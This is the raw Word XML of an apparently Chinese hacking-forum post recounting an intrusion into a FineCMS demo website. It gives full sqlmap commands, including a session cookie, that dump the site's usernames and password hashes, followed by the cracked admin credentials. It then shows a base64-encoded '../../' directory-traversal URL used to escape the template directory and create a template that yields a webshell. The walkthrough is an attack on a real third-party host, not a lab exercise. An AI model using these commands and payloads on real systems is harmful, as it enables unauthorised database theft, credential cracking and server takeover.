            <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:tooltip="5.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF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AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (50.3 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:18</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>不截图了，太麻烦了</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">./sqlmap.py -u "http://demo.finecms.net/index.php?s=member&amp;c=content&amp;a=edit&amp;id=655" --cookie "PHPSESSID=135qdpqp4e9vm3sda0b3446c13; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">CNZZDATA4264051=cnzz_eid=96253715-1352780242-&amp;ntime=1352780242&amp;cnzz_a=1&amp;retime=1352782758760&amp;sin=none&lt;ime=1352782758760&amp;rtime=0; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms_member_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=aToyNDM7" --dump -C "username" -T "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>demo_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>" -D "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>" -v 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">Database: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">Table: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>demo_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>[2 entries]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>| username |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>| admin</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>|</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">| </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>|</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">./sqlmap.py -u "http://demo.finecms.net/index.php?s=member&amp;c=content&amp;a=edit&amp;id=655" --cookie "PHPSESSID=135qdpqp4e9vm3sda0b3446c13; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">CNZZDATA4264051=cnzz_eid=96253715-1352780242-&amp;ntime=1352780242&amp;cnzz_a=1&amp;retime=1352782758760&amp;sin=none&lt;ime=1352782758760&amp;rtime=0; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>finecms_member_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>=aToyNDM7" --dump -C "password" -T "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>demo_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>" -D "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>" -v 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">Database: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve">Table: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>demo_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>[2 entries]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:lastRenderedPageBreak/>
              <w:t>+----------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>| password</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t>|</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>+----------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>| eae9f74652d3191c2868627641128f22 |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>| eae9f74652d3191c2868627641128f22 |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF"/>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="0" w:type="auto"/>
              <w:jc w:val="center"/>
              <w:tblCellSpacing w:w="0" w:type="dxa"/>
              <w:tblInd w:w="15" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
                <w:left w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
                <w:right w:val="single" w:sz="6" w:space="0" w:color="EFEFEF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5"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AA18CF" w:rsidRPr="00AA18CF">
              <w:trPr>
                <w:tblCellSpacing w:w="0" w:type="dxa"/>
                <w:jc w:val="center"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2505" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
                    <w:left w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EFEFEF"/>
                  </w:tcBorders>
                  <w:tcMar>
                    <w:top w:w="60" w:type="dxa"/>
                    <w:left w:w="60" w:type="dxa"/>
                    <w:bottom w:w="60" w:type="dxa"/>
                    <w:right w:w="60" w:type="dxa"/>
                  </w:tcMar>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF"/>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>解出了密码</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
              <w:t xml:space="preserve">admin </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dayrui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>这个是网站创始人权限，登录这个，准备拿</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>Finecms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>这个程序的</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>演示站</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>是</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>跟</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>apche</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>的搭配，在模板管理那儿，可以直接新建</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>a.php.html</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>来解析利用，但服务器作了限制，如图</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AA18CF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8" name="图片 8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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="1590675"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="7" name="图片 7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6874" descr="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8CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:tooltip="6.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF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AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (28.01 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:19</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>这个目录不可访问，后台还有备份数据的功能，这个好像利用不了，还有</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>个执行</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>的，不过我的突破点还是在模板那儿，模板所在的目录既然不能执行，那么跳出这个目录就可以了。那儿有个目录跳转的功能，如图</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish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6" name="图片 6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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="3648075"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="5" name="图片 5" descr="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6875" descr="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64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8CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:tooltip="7.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF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AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (50.36 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:19</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF"/>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00AA18CF">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>http://demo.finecms.net/index.php?s=admin&amp;c=theme&amp;dir=bWVtYmVyLw==&amp;iframe=0</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>这个是跳转的链接，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>后面的是目录了，不过是</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>base64</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>加密的，</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>所以，构造如下</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>,../../</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>就是</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>Li4vLi4v</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>，输入</w:t>
            </w:r>
            <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00AA18CF">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>http://demo.finecms.net/index.php?s=admin&amp;c=theme&amp;dir=Li4vLi4v=&amp;iframe=0</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>如图，</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="4" name="图片 4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18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="3990975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="3" name="图片 3" descr="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6876" descr="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99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A18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:tooltip="8.jpg" w:history="1">
              <w:r w:rsidRPr="00AA18CF">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (50.09 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>前天</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> 09:19</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>好了，目录已经跳转，那么就直接再新建</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>个</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>模板，就可以直接拿</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA18CF">
              <w:t>了。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA18CF" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:t>结果如图</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidRPr="00AA18CF" w:rsidRDefault="00AA18CF" w:rsidP="00AA18CF">
            <w:r w:rsidRPr="00AA18CF">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="图片 2" descr="https://forum.90sec.org/images/default/attachim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forum.90sec.org/images/default/attachim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A18CF">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5067300" cy="3752850"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1" name="图片 1" descr="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mg_6877" descr="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561" w:rsidRDefault="003D3561"/>
    <w:sectPr w:rsidR="003D3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16D"/>
    <w:rsid w:val="0001416D"/>
    <w:rsid w:val="003D3561"/>
    <w:rsid w:val="00AA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8C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A18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18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8C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A18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A18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0652">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="36" w:space="0" w:color="333333"/>
            <w:left w:val="single" w:sz="36" w:space="0" w:color="333333"/>
            <w:bottom w:val="single" w:sz="36" w:space="8" w:color="333333"/>
            <w:right w:val="single" w:sz="36" w:space="0" w:color="333333"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="612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7673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dashed" w:sz="6" w:space="0" w:color="888888"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="173981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32578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61367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96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1285039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91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145963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56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146468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031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7993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570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57713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94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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="100447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90sec.org/attachment.php?aid=Njg2OXw5NGIwNDkxNnwxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=yes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forum.90sec.org/attachment.php?aid=Njg3NHw1ZmY5ODhlZXwxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=ye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demo.finecms.net/index.php?s=admin&amp;c=theme&amp;dir=bWVtYmVyLw==&amp;iframe=0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forum.90sec.org/attachment.php?aid=Njg3MXw0ZjQ5YjdhMnwxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=yes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hyperlink" Target="https://forum.90sec.org/attachment.php?aid=Njg3M3wwMDhhMzk3MXwxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=Njg3NXw0MDlkZmM5MnwxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=yes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4.jpeg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=Njg3NnxlZmZkM2MzNXwxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://c0deplay.com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9.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=Njg3MHxmZTQzYWNmNXwxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=yes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forum.90sec.org/attachment.php?aid=Njg3MnxlMDFiMjhjY3wxMzUyOTk3NDM1fGJhNGVqcWhlaU9LV1RXTSt1SDR5emVMb3FPS2lTa2VSM2IyM0pISHFnaXI0TSt3&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo.finecms.net/index.php?s=admin&amp;c=theme&amp;dir=Li4vLi4v=&amp;iframe=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882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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>g4</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-15T16:56:00Z</dcterms:created>
